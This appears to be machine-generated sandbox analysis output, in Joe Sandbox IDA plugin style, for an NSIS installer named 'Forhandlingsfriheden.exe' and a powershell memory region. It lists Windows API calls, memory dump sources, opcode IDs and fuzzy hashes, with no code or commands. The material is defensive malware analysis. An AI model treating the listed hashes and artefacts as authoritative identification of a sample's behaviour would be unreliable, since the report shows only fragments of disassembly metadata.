                                                                            • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                            • Instruction Fuzzy Hash: 1711EB73A0422837DB0056ADAC46E9E3698DF85374F250237FA66F21D5D978CC2142D8
                                                                            APIs
                                                                              • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Forhandlingsfriheden.exe"), ref: 00405EC9
                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                                                            • lstrlenW.KERNEL32(00425710,00000000,00425710,00425710, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Forhandlingsfriheden.exe"), ref: 00405F71
                                                                            • GetFileAttributesW.KERNEL32(00425710,00425710,00425710,00425710,00425710,00425710,00000000,00425710,00425710, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00405F81
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                            • String ID: 4#v$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 3248276644-3758603893
                                                                            • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                            • Instruction ID: 8289fae0aeb6f8c8bb33a18b648b52325edb3dacd4d1dfbf908f72671121fed4
                                                                            • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                            • Instruction Fuzzy Hash: 5EF0F435115E6326E722373A5C49AAF1A04CEC6324B59053BF8A5B22C1DF3C8D5389BE
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E16
                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E20
                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E32
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E10
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 2659869361-3936084776
                                                                            • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                            • Instruction ID: 6241345b1480893618f3385b5901a002ffa6f457481071e3b6de6f74fd74f6f8
                                                                            • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                            • Instruction Fuzzy Hash: 00D05E71101634AAC2117B48AC08CDF62AC9E46344341402AF141B20A5C7785A5186ED
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
                                                                            • GetTickCount.KERNEL32 ref: 0040306F
                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                                            • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                            • String ID:
                                                                            • API String ID: 2102729457-0
                                                                            • Opcode ID: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                                            • Instruction ID: 1fe6cbc8f6a725ad0ac4e372fd1d3cf1f1d396d39c9c490f6de0fad46aa3fa9f
                                                                            • Opcode Fuzzy Hash: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                                            • Instruction Fuzzy Hash: 1CF05431602621ABC6316F54FD08A9B7BA9FB44B13F41087AF045B11A9CB7948828B9C
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00405569
                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004055BA
                                                                              • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3748168415-3916222277
                                                                            • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                            • Instruction ID: e9ac82e17096a71ceb81da4f6da7be56a9305aae285fff99253fdd5fe3b389a1
                                                                            • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                            • Instruction Fuzzy Hash: 6B017171200609BFDF315F11DD84AAB3A66FB84754F100037FA00B51E5C7BA8D52AE69
                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406680,80000002), ref: 00406455
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00406460
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID: : Completed
                                                                            • API String ID: 3356406503-2954849223
                                                                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                            • Instruction ID: ab0cc6cc405738cc07c99bf25685dc2411b0540f073fb059e05756a610da7e73
                                                                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                            • Instruction Fuzzy Hash: 4F015E72510209AADF218F51CC05EDB3BA8EB54354F01403AFD5992150D738D968DB94
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,76233420,00000000,C:\Users\user\AppData\Local\Temp\,00403B56,00403A6C,?,?,00000008,0000000A,0000000C), ref: 00403B98
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00403B9F
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B7E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: Free$GlobalLibrary
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 1100898210-3936084776
                                                                            • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                            • Instruction ID: 6342289a3e1e3ca18c24491f6708bfd4349b13536718f8c5743bc800c8661b5d
                                                                            • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                            • Instruction Fuzzy Hash: FBE08C329015205BC6211F19ED04B1A77B86F45B27F06402AE8807B26287B82C838FD8
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E62
                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E72
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrlen
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 2709904686-3125694417
                                                                            • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                            • Instruction ID: b9e9e75b8ba1df67f9f167ecd7c14c3df7ff164ad8267efb590a8552da577330
                                                                            • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                            • Instruction Fuzzy Hash: 81D0A7B3400930DAC3127718EC04D9F77ACEF1634074A443AE580B7165D7785D8186EC
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBE
                                                                            • CharNextA.USER32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                            • Instruction ID: c3aaa261a9e4bb9915bd58c77e7651ea6c0a11e303954dac61c17192ece284d7
                                                                            • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                            • Instruction Fuzzy Hash: F7F06231105459EFDB029BA5DD00D9EBBA8EF15254B2540BAE840F7250D678DE019B69
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5b370ef930192c86143987451282b9eeca70070f0a1064ccea0a11abb66777dd
                                                                            • Instruction ID: 8df52360cf267873d7b7b8389b8a43c3494d3618b698ff3058ac79184812b480
                                                                            • Opcode Fuzzy Hash: 5b370ef930192c86143987451282b9eeca70070f0a1064ccea0a11abb66777dd
                                                                            • Instruction Fuzzy Hash: 68216B32B003159FEB649A7A4802B7BBAC6ABC4715F24842EA505CB7C5DD75C841E371
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d6b68d6757ac194cf40585c6f9049d8b39cd6ca6b9fa7fd23270e085cc641217
                                                                            • Instruction ID: 9f96bcdbc97489cc8f7957218cf478877f69f5c75abd5acdd5d5cbbba724c22f
                                                                            • Opcode Fuzzy Hash: d6b68d6757ac194cf40585c6f9049d8b39cd6ca6b9fa7fd23270e085cc641217
                                                                            • Instruction Fuzzy Hash: 11827B34F002198FDB64DF58C850BAABBB2BB95314F14C0A9D9099F396DB72DD81CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 68daa4399ddb43d98578c8648765d5deba78b57d6d481aa4fa0e3b1557692696
                                                                            • Instruction ID: d970c267143e9d660bfee6105e176ae3d102b94a32134b373340e1e0a5dd8429
                                                                            • Opcode Fuzzy Hash: 68daa4399ddb43d98578c8648765d5deba78b57d6d481aa4fa0e3b1557692696
                                                                            • Instruction Fuzzy Hash: EE523974B002149FE764DF54C890FAABBB2BB85314F14C099D909AF392DB72ED81CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4d410b068275301c37a6ed84fbfb0adfb5f5787f2dd54d970c46271c7389ad87
                                                                            • Instruction ID: e5ec4c8ac2dfa69e2baa589ec80f5b80e97d562886749d0884e9d546bcb19305
                                                                            • Opcode Fuzzy Hash: 4d410b068275301c37a6ed84fbfb0adfb5f5787f2dd54d970c46271c7389ad87
                                                                            • Instruction Fuzzy Hash: 7C422974E002148FDB64CF58C990FAABBB2BB95304F14C099D909AF356DB72ED85CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fab61872dc257539080a51e438459a9406a7bcd6bcc095abbf550b1082af7254
                                                                            • Instruction ID: 1b25e2bd3710abeaee453c7eb3ad82fe9dd55785cab99874f596d4778a82f1ad
                                                                            • Opcode Fuzzy Hash: fab61872dc257539080a51e438459a9406a7bcd6bcc095abbf550b1082af7254
                                                                            • Instruction Fuzzy Hash: 54422874E002148FDB64CF58C990FAABBB2BB95304F14C099D909AF356DB72ED81CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5bdaa85b93e730fd0928785cb32284694f4eddcf8e6d5e3ba66fd49dcfa4c41c
                                                                            • Instruction ID: 4da2c61fdd8969a8af35499d288cfd830cfbcee30f22bac499068c3b620f7bf1
                                                                            • Opcode Fuzzy Hash: 5bdaa85b93e730fd0928785cb32284694f4eddcf8e6d5e3ba66fd49dcfa4c41c
                                                                            • Instruction Fuzzy Hash: E3423C74B002149FD764DF58CD91FAABBA2EB89704F148099E9099F391CB72ED81CF91
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 13eba9dd8f154c9c140f43558f4c96b14c3f5630bcc86e4ebe2e4dab4d4c4c00
                                                                            • Instruction ID: 11fe5c08fd016a7a1a84787dd0432fe68182216d31b8b25cb0fa728b0c19bc0d
                                                                            • Opcode Fuzzy Hash: 13eba9dd8f154c9c140f43558f4c96b14c3f5630bcc86e4ebe2e4dab4d4c4c00
                                                                            • Instruction Fuzzy Hash: EE225774F01204DFDB54DF99C990FAABBA2AF89704F158068E905AF365CB72EC41CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
